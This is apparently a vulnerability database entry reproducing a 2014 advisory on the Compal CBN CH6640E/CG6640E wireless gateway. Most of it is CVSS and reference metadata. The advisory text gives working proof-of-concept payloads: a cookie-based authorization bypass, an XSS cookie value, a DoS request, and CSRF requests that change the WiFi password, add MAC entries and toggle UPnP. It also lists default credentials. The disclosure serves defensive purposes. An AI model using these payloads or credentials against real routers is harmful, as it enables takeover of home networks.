Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0177",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "77760"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8654",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2014-8654",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-76599",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8654",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8654",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-189",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76599",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. (2) setWirelessSecurity.html of psKey Via parameters wifi The password is changed. (3) setBasicDHCP1.html of add_static In action MacAddress Static via parameters MAC An address is added. (4) setAdvancedOptions.html of apply Of UPnP Via parameters UPnP Is enabled or disabled. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. The \u0027UPnP\u0027 parameter in the apply action of the html page exploits this vulnerability to enable or disable UPnP. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8654"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76599",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76599"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8654",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.9
},
{
"db": "BID",
"id": "70762",
"trust": 2.7
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113843",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113842",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113841",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113840",
"trust": 1.8
},
{
"db": "XF",
"id": "98329",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "77760",
"trust": 0.4
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76599",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"id": "VAR-201411-0177",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.528000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 2.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.0,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98329"
},
{
"trust": 1.0,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76599"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77760"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"date": "2014-11-06T15:55:10.803000",
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76599"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77760"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Cross-site request forgery vulnerability in hardware firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
}
],
"trust": 0.6
}
}
VAR-201411-0176
Vulnerability from variot - Updated: 2025-04-13 23:14Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
